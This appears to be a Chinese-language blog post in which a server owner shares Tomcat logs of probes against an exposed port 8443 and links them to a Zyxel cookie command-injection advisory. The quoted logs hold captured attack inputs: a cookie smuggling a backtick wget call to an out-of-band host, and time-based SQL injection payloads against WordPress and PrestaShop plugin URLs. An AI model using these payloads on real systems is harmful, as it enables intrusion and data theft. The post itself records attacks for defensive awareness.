因為有一台伺服器,一直沒關機,而且是在神奇的 8443 port, 居然有駭客挑戰去入侵。
駭客,滿客氣的,並不是一直狂試有問題的模式,大約1天才看到一行 exception, 也許其他的input 都是合法的,所以沒出現在 debug console 裡。
最近的新聞有:
Zyxel於2024年9月3日發布安全公告,修補多款AP(access point)及資安路由器(Security router)的作業系統命令注入漏洞CVE-2024-7261(CVSSv3評分9.8),可能允許未經身份驗證的攻擊者發送精心設計的cookie來執行作業系統命令。
Zyxel說明某些AP及資安路由器(USG LITE 60AX)版本CGI程式中參數「host」的特殊元素不正確中和(improper neutralization),攻擊者可以發送特製的cookie,進而無需身份驗證即可執行作業系統命令,可能會帶來重大風險,包括資料外洩或服務中斷。
感覺,用程式來組合出不合邏輯的內容,有機會可以讓 server side 的程式造成跳脫,進而入侵。
分享在 eclipse 裡的 console log:
Sep 14, 2024 2:02:05 PM org.apache.coyote.http11.Http11Processor service
INFO: Error parsing HTTP request header
Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.
java.lang.IllegalArgumentException: Invalid character found in method name [0x160x030x000x00S0x010x000x00O0x030x00?G0xc30x970xc30xb70xc20xba,0xc30xae0xc30xaa0xc20xb2`~0xc30xb30x000xc30xbd0xc20x82{0xc20xb90xc30x950xc20x960xc30x88w0xc20x9b0xc30xa60xc30x840xc30x9b<=0xc30x9bo0xc30xaf0x10n0x000x00(0x000x160x000x130x000x0a0x00f0x000x050x000x040x00e0x00d0x00c0x00b0x00a0x00`0x000x150x000x120x000x090x000x140x000x110x000x080x000x060x000x030x010x00...]. HTTP method names must be tokens
at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:407)
at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:256)
at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:63)
at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:936)
at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1791)
at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:52)
at org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1190)
at org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:63)
at java.base/java.lang.Thread.run(Thread.java:1570)
Sep 16, 2024 2:22:43 AM org.apache.tomcat.util.http.parser.Cookie logInvalidHeader
INFO: A cookie header was received [sessionid='`wget http://crd6bmsqa1h3u36ee03gipxw698cym3e9.oast.pro`'] that contained an invalid cookie. That cookie will be ignored.
Note: further occurrences of this error will be logged at DEBUG level.
Sep 17, 2024 9:23:55 PM org.apache.coyote.http11.Http11Processor service
INFO: Error parsing HTTP request header
Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.
java.lang.IllegalArgumentException: Invalid character found in the request target [/wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json ]. The valid characters are defined in RFC 7230 and RFC 3986
at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:482)
at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:256)
at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:63)
at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:936)
at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1791)
at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:52)
at org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1190)
at org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:63)
at java.base/java.lang.Thread.run(Thread.java:1570)
Sep 19, 2024 5:43:51 AM org.apache.coyote.http11.Http11Processor service
INFO: Error parsing HTTP request header
Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.
java.lang.IllegalArgumentException: Invalid character found in the request target [/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) ]. The valid characters are defined in RFC 7230 and RFC 3986
at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:482)
at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:256)
at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:63)
at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:936)
at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1791)
at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:52)
at org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1190)
at org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:63)
at java.base/java.lang.Thread.run(Thread.java:1570)